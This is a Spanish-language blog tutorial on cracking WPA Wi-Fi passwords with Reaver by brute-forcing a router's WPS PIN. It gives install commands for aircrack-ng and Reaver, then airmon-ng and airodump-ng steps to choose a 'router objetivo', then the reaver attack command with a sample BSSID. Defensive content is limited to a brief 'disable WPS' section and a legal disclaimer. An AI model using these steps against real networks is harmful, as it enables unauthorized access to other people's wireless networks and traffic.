Reaver, Crackeando WPA en redes Wi-Fi
Reaver es una herramienta que explota agujeros de seguridad en redes inalámbricas y puede crackear la mayoria de los Routers. Las redes WPA siempre han presentado mayor problema ya que el algoritmo de cifrado es muy fuerte, pero no se resiste a este software que es el terror de las wifi. Tómese este tutorial como información de como securizar nuestra red y de que estamos expuestos siempre a este tipo de software malicioso. En el artículo original en lifehacker hasta explican como tomar medidas para evitar este tipo de ataque.
En primer lugar en algunas distros de backtrack se puede instalar de forma sencilla con apt-get pero en distros basadas en ubuntu no tienen el repositorio instalado.
Para tener las dos herramientas necesarias para este tutorial tenemos que hacer estos pasos:
1 – instalar aircrack-ng
Para eso vamos a la página oficial de descargas de aircrack-ng y nos dan enlaces para bajarnos el paquete y lo instalamos con dpkg.
nexolinux m3t4g4m3 # wget http://ubuntu2.cica.es/ubuntu/ubuntu/pool/universe/a/aircrack-ng/aircrack-ng_1.1-5_amd64.deb nexolinux m3t4g4m3 # dpkg -i aircrack-ng_1.1-5_amd64.deb
2 – Instalar reaver.
Para ello vamos a la página que tiene de descarga nos bajamos el código fuente y pasamos a compilarlo:
nexolinux m3t4g4m3 # tar zxvf reaver-1.4.tar.gz nexolinux reaver-1.4 # ./configure nexolinux reaver-1.4 # make && make install
3 – preparación para el crackeo
Para ello necesitamos el nombre de nuestra interfaz, el BSSID del router que vamos a crackear y poner la tarjeta en modo monitor, esta última tarea es lo que nos da el aircrack-ng
nexolinux m3t4g4m3 # iwconfig
Nos aparecerá algo como en la imagen:
Ponemos nuestra tarjeta de red en modo monitor:
nexolinux m3t4g4m3 # airmon-ng start wlan0
En algunos casos no nos va a reconocer wlan0, al ejecutar este comando nos sale el nombre del modo monitor de la interfaz, con lo que con poner ese nombre nos funcionará de esta forma:
nexolinux m3t4g4m3 # airmon-ng start mon0
Buscamos el BSSID del router objetivo, para ello ejecutamos esto:
nexolinux m3t4g4m3 # airodump-ng mon0
Y veremos una lista completa de las redes que tenemos al alcance:
Esperamos un rato e irá listando todas las redes posibles, pulsando Ctrl + C paramos el proceso pero se nos quedarán en pantalla con lo que lo tenemos cómodo luego para copiarlo.
4 – Crackeando la contraseña WPA con reaver
Ejecutamos este comando en el terminal:
nexolinux m3t4g4m3 # reaver -i moninterface -b bssif -vv
En el caso de este ejemplo sería así:
nexolinux m3t4g4m3 # reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
Ahora al darle tenemos que tener paciencia, puede tardar entre 2 y 10 horas hasta que consiga sacar la contraseña. Si lo haces ves que hace una serie de PINs para atacar el router por fuerza bruta, una detrás de otra, Cuando saca la contraseña saldrá algo así:
Factores a considerar:
No tiene porqué funcionar en todos los routers, esto no nos asegura conseguir la contraseña, tenemos que tener como mínimo una señal fuerte para el intento. Durante el proceso puede tener timeouts por encontrarse en un bucle con el mismo PIN, pero no pasa nada, déjalo funcionar y dale paciencia.
Cómo funciona reaver.
Reaver toma ventaja de una vulnerabilidad llamada WPS, o configuración protegida wifi, que es una característica en muchísimos routers para un proceso sencillo de instalación. Tienen un PIN en el dispositivo que es lo que explota reaver para revelar la contraseña.
Como protegernos de reaver.
En primer lugar deshabilitando el WPS, sería mejor no tenerlo directamente pues incluso con el WPS deshabilitado, puede crackear el password igualmente en algunos casos.
Nota: recordad que entrar en redes ajenas sin permiso es ilegal y puede traernos consecuencias, además también estamos expuestos a que en la otra red nos vean a nosotros y podemos ser víctimas de un ataque.
Usadlo con cuidado 🙂